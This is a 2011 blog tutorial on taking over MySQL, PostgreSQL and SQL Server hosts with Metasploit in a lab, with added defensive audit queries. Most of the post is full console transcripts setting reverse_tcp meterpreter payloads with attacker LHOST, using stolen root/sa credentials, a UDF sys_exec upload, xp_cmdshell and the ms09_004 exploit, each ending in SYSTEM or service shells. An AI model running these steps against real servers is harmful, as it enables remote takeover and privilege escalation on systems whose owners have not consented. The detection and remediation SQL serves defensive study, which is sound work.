Pentesting database servers

When pentesting a network we sometimes find several network resources, among them web servers, DNS servers, mail servers and so on; here the focus is pentesting of web servers. When we look at a website's configuration, the database server it uses is sometimes separate from the web server. So how do we take control of that remote database server once we know the important details, namely the username, the password and the name of the database in use?

I will try to give a solution to the case above. The topology used can be seen in the figure. The tool is the usual one: Metasploit again. As it happens, a few months ago (I forget exactly when) the Metasploit team added 2 modules for database hacking, namely modules for MySQL and PostgreSQL.

1. MySQL Server
Pentesting MySQL can be done in several ways, for example with Metasploit or with the MySQL blob technique, but the core is the same: a new function (a user defined function) such as sys_eval or sys_exec is added to the server and then used to execute the payload. For more details about UDFs see http://www.mysqludf.org/

Several kinds of modules are used (auxiliary and exploit):

Auxiliary
=========

   Name                    Description
   ----                    -----------
   admin/mysql/mysql_enum  MySQL Enumeration Module
   admin/mysql/mysql_sql   MySQL SQL Generic Query

Exploit
=======

   Name                         Description
   ----                         -----------
   windows/mysql/mysql_payload  Oracle MySQL for Microsoft Windows Payload Execution

The MySQL configuration can be inspected with the auxiliary module admin/mysql/mysql_enum:

msf > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to authenticate as

msf auxiliary(mysql_enum) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_enum) > set PASSWORD ian123
PASSWORD => ian123
msf auxiliary(mysql_enum) > run

[*] Running MySQL Enumerator…
[*] Enumerating Parameters
[*] MySQL Version: 5.5.11
[*] Compiled for the following OS: Win32
[*] Architecture: x86
[*] Server Hostname: vee-lab
[*] Data Directory: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.5\Data\
[*] Logging of queries and logins: OFF
[*] Old Password Hashing Algorithm OFF
[*] Loading of local files: ON
[*] Logins with old Pre-4.1 Passwords: OFF
[*] Allow Use of symlinks for Database Files: YES
[*] Allow Table Merge:
[*] SSL Connection: DISABLED

--------- SNIP ---------

To hack the database itself, use the mysql_payload exploit:

msf > use exploit/windows/mysql/mysql_payload
msf exploit(mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mysql_payload) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(mysql_payload) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(mysql_payload) > set USERNAME root
USERNAME => root
msf exploit(mysql_payload) > set PASSWORD ian123
PASSWORD => ian123
msf exploit(mysql_payload) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.10.2:4444
msf exploit(mysql_payload) > [*] Checking target architecture…
[*] Checking for sys_exec()…
[*] Checking target architecture…
[*] Checking for MySQL plugin directory…
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin/itfkdrZG.dll…
[*] Checking for sys_exec()…
[*] Command Stager progress – 1.47% done (1499/102246 bytes)
[*] Command Stager progress – 2.93% done (2998/102246 bytes)
[*] Command Stager progress – 4.40% done (4497/102246 bytes)
[*] Command Stager progress – 5.86% done (5996/102246 bytes)
[*] Command Stager progress – 7.33% done (7495/102246 bytes)
[*] Command Stager progress – 8.80% done (8994/102246 bytes)
[*] Command Stager progress – 10.26% done (10493/102246 bytes)
[*] Command Stager progress – 11.73% done (11992/102246 bytes)
[*] Command Stager progress – 13.19% done (13491/102246 bytes)
[*] Command Stager progress – 14.66% done (14990/102246 bytes)
……………………………..
[*] Command Stager progress – 86.50% done (88441/102246 bytes)
[*] Command Stager progress – 87.96% done (89940/102246 bytes)
[*] Command Stager progress – 89.43% done (91439/102246 bytes)
[*] Command Stager progress – 90.90% done (92938/102246 bytes)
[*] Command Stager progress – 92.36% done (94437/102246 bytes)
[*] Command Stager progress – 93.83% done (95936/102246 bytes)
[*] Command Stager progress – 95.29% done (97435/102246 bytes)
[*] Command Stager progress – 96.76% done (98934/102246 bytes)
[*] Command Stager progress – 98.19% done (100400/102246 bytes)
[*] Command Stager progress – 99.59% done (101827/102246 bytes)
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Meterpreter session 1 opened (192.168.10.2:4444 -> 192.168.10.11:1041) at 2011-05-03 16:04:07 +0700
msf exploit(mysql_payload) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > ps

Process list
============

PID   Name              Arch  Session  User                          Path
---   ----              ----  -------  ----                          ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
628 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
676 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
700 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
744 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
756 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
912 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
980 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1064 SbieSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Sandboxie\SbieSvc.exe
1080 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1208 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1240 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1588 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1644 explorer.exe x86 0 LAHARISI\ian-lab1 C:\WINDOWS\Explorer.EXE
1736 ehtray.exe x86 0 LAHARISI\ian-lab1 C:\WINDOWS\ehome\ehtray.exe
1744 SharedIntApp.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Parallels\Parallels Tools\SIA\SharedIntApp.exe
1752 prl_cc.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Parallels\Parallels Tools\prl_cc.exe
1760 jusched.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Common Files\Java\Java Update\jusched.exe
1772 SbieCtrl.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Sandboxie\SbieCtrl.exe

2044 ehrecvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\eHome\ehRecvr.exe
144 ehSched.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\eHome\ehSched.exe
224 jqs.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Java\jre6\bin\jqs.exe
260 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
512 msmdsrv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Microsoft SQL Server\MSSQL.2\OLAP\bin\msmdsrv.exe
528 mysqld.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\MySQL\MySQL Server 5.5\bin\mysqld.exe
……….
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
meterpreter > shell
Process 504 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.5\Data>

How it works:

First Metasploit checks the MySQL server, determines the location of the plugin directory and determines the target architecture. It then uploads lib_mysqludf_sys_32.dll (data/exploits/mysql/lib_mysqludf_sys_32.dll) into the plugin directory. Next Metasploit checks for the sys_exec function; if the function does not exist, Metasploit creates it. The function is then executed with the uploaded payload as its parameter.
Written in MySQL syntax it is roughly:
mysql> CREATE FUNCTION sys_exec RETURNS STRING SONAME 'name_of_uploaded_library.dll';
mysql> -- backslashes are escape characters inside a MySQL string literal, so they are doubled
mysql> SELECT sys_exec('c:\\path\\payload');

From the results above it can be seen that when exploitation succeeds, privilege escalation succeeds at the same time, because the MySQL service is run by System...
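As an added defender-side check for the UDF technique just described (example queries written for this post, not part of the original article or of Metasploit), the statements below show where a registered UDF leaves traces on a MySQL server and how to remove it. They assume the auditor connects with an account that can read the mysql schema and set global variables.

```sql
-- Added audit queries (example, not from the original post). Run as an
-- account that can read the mysql schema and change global variables.

-- 1. Every UDF the server knows about, with the library it maps to.
--    A stock server has none; an entry such as sys_exec -> itfkdrZG.dll
--    (a random file name, as seen in the transcript above) is a red flag.
SELECT name, ret, dl, type
FROM mysql.func;

-- 2. The directory the library must be dropped into. Any DLL here that
--    the installer did not place is suspect and should be hashed/kept.
SHOW VARIABLES LIKE 'plugin_dir';

-- 3. Can the server read/write arbitrary files? An empty secure_file_priv
--    means no restriction; "Loading of local files: ON" in the enum
--    output above corresponds to local_infile.
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'local_infile';

-- 4. Accounts able to register a UDF: INSERT on mysql.func (or a global
--    grant implying it) plus FILE to drop the library. The transcript
--    used root, which has everything; application accounts never need these.
SELECT user, host, File_priv, Insert_priv, Super_priv
FROM mysql.user
WHERE File_priv = 'Y' OR Super_priv = 'Y' OR Insert_priv = 'Y';

-- 5. Remediation once a rogue UDF is confirmed: unregister it, then delete
--    the library from plugin_dir by hand and rotate the account used.
--    Running mysqld as a dedicated low-privilege Windows account instead
--    of LocalSystem also caps what a future sys_exec could do.
DROP FUNCTION IF EXISTS sys_exec;
DROP FUNCTION IF EXISTS sys_eval;

-- 6. Visibility: the enum output showed query logging OFF. With the general
--    log written to a table, the CREATE FUNCTION statement itself is recorded.
SET GLOBAL general_log = 'ON';
SET GLOBAL log_output  = 'TABLE';
SELECT event_time, user_host, argument
FROM mysql.general_log
WHERE argument LIKE 'CREATE FUNCTION%' OR argument LIKE '%sys_exec%';
```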

2. PostgreSQL
Exploit references for PostgreSQL include:

Auxiliary

   admin/postgres/postgres_readfile   PostgreSQL Server Generic Query
   admin/postgres/postgres_sql        PostgreSQL Server Generic Query
   scanner/postgres/postgres_login    PostgreSQL Login Utility
   scanner/postgres/postgres_version  PostgreSQL Version Probe

Exploit

   windows/postgres/postgres_payload  2009-04-10  PostgreSQL for Microsoft Windows Payload Execution

Example exploitation:

msf > use exploit/windows/postgres/postgres_payload
msf exploit(postgres_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(postgres_payload) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(postgres_payload) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(postgres_payload) > set USERNAME postgres
USERNAME => postgres
msf exploit(postgres_payload) > set PASSWORD ian123456
PASSWORD => ian123456
msf exploit(postgres_payload) > exploit -j
[*] Authentication successful and vulnerable version 8.3 on Windows confirmed
[*] Uploaded CHrzTDpZ.dll as OID 2461 to table ulbuaxkj(ipyumxky)
[*] Command Stager progress – 1.48% done (1499/101465 bytes)
[*] Command Stager progress – 2.95% done (2998/101465 bytes)
[*] Command Stager progress – 4.43% done (4497/101465 bytes)
[*] Command Stager progress – 5.91% done (5996/101465 bytes)
[*] Command Stager progress – 7.39% done (7495/101465 bytes)
[*] Command Stager progress – 8.86% done (8994/101465 bytes)
[*] Command Stager progress – 10.34% done (10493/101465 bytes)
[*] Command Stager progress – 11.82% done (11992/101465 bytes)
[*] Command Stager progress – 13.30% done (13491/101465 bytes)
[*] Command Stager progress – 14.77% done (14990/101465 bytes)
[*] Command Stager progress – 16.25% done (16489/101465 bytes)
[*] Command Stager progress – 17.73% done (17988/101465 bytes)
[*] Command Stager progress – 19.21% done (19487/101465 bytes)
[*] Command Stager progress – 20.68% done (20986/101465 bytes)
[*] Command Stager progress – 22.16% done (22485/101465 bytes)
[*] Command Stager progress – 23.64% done (23984/101465 bytes)
[*] Command Stager progress – 25.12% done (25483/101465 bytes)
[*] Command Stager progress – 26.59% done (26982/101465 bytes)
[*] Command Stager progress – 28.07% done (28481/101465 bytes)
[*] Command Stager progress – 29.55% done (29980/101465 bytes)
[*] Command Stager progress – 31.02% done (31479/101465 bytes)
[*] Command Stager progress – 32.50% done (32978/101465 bytes)
[*] Command Stager progress – 33.98% done (34477/101465 bytes)
[*] Command Stager progress – 35.46% done (35976/101465 bytes)
[*] Command Stager progress – 36.93% done (37475/101465 bytes)
……….
[*] Command Stager progress – 82.73% done (83944/101465 bytes)
[*] Command Stager progress – 84.21% done (85443/101465 bytes)
[*] Command Stager progress – 85.69% done (86942/101465 bytes)
[*] Command Stager progress – 87.16% done (88441/101465 bytes)
[*] Command Stager progress – 88.64% done (89940/101465 bytes)
[*] Command Stager progress – 90.12% done (91439/101465 bytes)
[*] Command Stager progress – 91.60% done (92938/101465 bytes)
[*] Command Stager progress – 93.07% done (94437/101465 bytes)
[*] Command Stager progress – 94.55% done (95936/101465 bytes)
[*] Command Stager progress – 96.03% done (97435/101465 bytes)
[*] Command Stager progress – 97.51% done (98934/101465 bytes)
[*] Command Stager progress – 98.95% done (100400/101465 bytes)
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Command Stager progress – 100.00% done (101465/101465 bytes)
[*] Meterpreter session 2 opened (192.168.10.2:4444 -> 192.168.10.11:1050) at 2011-05-03 16:35:29 +0700

msf exploit(postgres_payload) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getuid
Server username: LAHARISI\postgres
meterpreter > shell
Process 3248 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\PostgreSQL\8.3\data>

3. SQL Server
Pentesting SQL Server is not very different from the two previous databases, except that SQL Server has several exploits that may be quite useful besides mssql_payload.

msf > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf auxiliary(mssql_enum) > set USERNAME sa
USERNAME => sa
msf auxiliary(mssql_enum) > set PASSWORD ian123456
PASSWORD => ian123456
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration…
[*] Version:
[*] Microsoft SQL Server 2005 – 9.00.1399.06 (Intel X86)
[*] Oct 14 2005 00:33:37
[*] Copyright (c) 1988-2005 Microsoft Corporation
[*] Standard Edition on Windows NT 5.1 (Build 2600: Service Pack 3)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Not Enabled
[*] Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] Database name:master
[*] Database Files for master:
[*] C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf
[*] Database name:tempdb

……………

Exploitation using mssql_payload:

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(mssql_payload) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(mssql_payload) > set USERNAME sa
USERNAME => sa
msf exploit(mssql_payload) > set PASSWORD ian123456
PASSWORD => ian123456
msf exploit(mssql_payload) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.10.2:4444
msf exploit(mssql_payload) > [*] Command Stager progress – 1.47% done (1499/102246 bytes)
[*] Command Stager progress – 2.93% done (2998/102246 bytes)
[*] Command Stager progress – 4.40% done (4497/102246 bytes)
[*] Command Stager progress – 5.86% done (5996/102246 bytes)
[*] Command Stager progress – 7.33% done (7495/102246 bytes)
[*] Command Stager progress – 8.80% done (8994/102246 bytes)
[*] Command Stager progress – 10.26% done (10493/102246 bytes)
[*] Command Stager progress – 11.73% done (11992/102246 bytes)
[*] Command Stager progress – 13.19% done (13491/102246 bytes)
[*] Command Stager progress – 14.66% done (14990/102246 bytes)
[*] Command Stager progress – 16.13% done (16489/102246 bytes)
[*] Command Stager progress – 17.59% done (17988/102246 bytes)
[*] Command Stager progress – 19.06% done (19487/102246 bytes)
[*] Command Stager progress – 20.53% done (20986/102246 bytes)
[*] Command Stager progress – 21.99% done (22485/102246 bytes)
[*] Command Stager progress – 23.46% done (23984/102246 bytes)
[*] Command Stager progress – 24.92% done (25483/102246 bytes)
[*] Command Stager progress – 26.39% done (26982/102246 bytes)
………..
[*] Command Stager progress – 93.83% done (95936/102246 bytes)
[*] Command Stager progress – 95.29% done (97435/102246 bytes)
[*] Command Stager progress – 96.76% done (98934/102246 bytes)
[*] Command Stager progress – 98.19% done (100400/102246 bytes)
[*] Command Stager progress – 99.59% done (101827/102246 bytes)
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Meterpreter session 4 opened (192.168.10.2:4444 -> 192.168.10.11:1052) at 2011-05-03 16:55:10 +0700

msf exploit(mssql_payload) > sessions -i 4
[*] Starting interaction with 4…

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4084 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Metasploit makes sure the xp_cmdshell facility is enabled; if it is not, Metasploit enables it. The payload is uploaded and then executed through xp_cmdshell.
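As an added defender-side companion to the xp_cmdshell path described above (example T-SQL written for this post, not part of the original article or of Metasploit), the script below audits the same surface-area options mssql_enum reported, shows where the toggle leaves a trace, and turns the procedures back off. It assumes a sysadmin connection; xp_readerrorlog is an undocumented procedure and the argument order used here is the commonly used one, which is an assumption.

```sql
-- Added audit script (example, not from the original post). Run as sysadmin.

-- 1. Surface-area options that mssql_enum listed above; value_in_use = 1
--    means enabled. The transcript showed xp_cmdshell and remote access on.
SELECT name, value_in_use, is_dynamic
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'remote access', 'Database Mail XPs', 'c2 audit mode');

-- 2. Logins that can run xp_cmdshell with the service account's rights:
--    every sysadmin. An enabled 'sa' with a guessable password is exactly
--    the precondition the exploit relied on.
SELECT name, type_desc, is_disabled
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- 3. Detection: sp_configure writes every change to the SQL Server error
--    log, so a tool flipping xp_cmdshell on leaves a line such as
--    "Configuration option 'xp_cmdshell' changed from 0 to 1".
--    (xp_readerrorlog: log number, 1 = SQL Server log, search string.)
EXEC xp_readerrorlog 0, 1, N'xp_cmdshell';

-- 4. Remediation: turn the procedures back off and hide advanced options.
--    The service account is what xp_cmdshell runs as; the transcript got
--    NT AUTHORITY\SYSTEM, so a low-privilege service account matters too.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. Contain: disable sa so password guessing against it fails, and give
--    administrators named logins instead.
ALTER LOGIN sa DISABLE;
```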

Another alternative is to make use of a SQL Server bug:

msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(ms09_004_sp_replwritetovarbin) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(ms09_004_sp_replwritetovarbin) > set USERNAME sa
USERNAME => sa
msf exploit(ms09_004_sp_replwritetovarbin) > set PASSWORD ian123456
PASSWORD => ian123456
msf exploit(ms09_004_sp_replwritetovarbin) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.10.2:4444
[*] Attempting automatic target detection…
msf exploit(ms09_004_sp_replwritetovarbin) > [*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Meterpreter session 5 opened (192.168.10.2:4444 -> 192.168.10.11:1053) at 2011-05-03 17:03:34 +0700
msf exploit(ms09_004_sp_replwritetovarbin) > sessions -i 5
[*] Starting interaction with 5…

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3204 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

Enjoy..

— happy hacking —

Ld Ian Hrm a.k.a laharisi

Posted on May 3, 2011, in database, Hacking & security.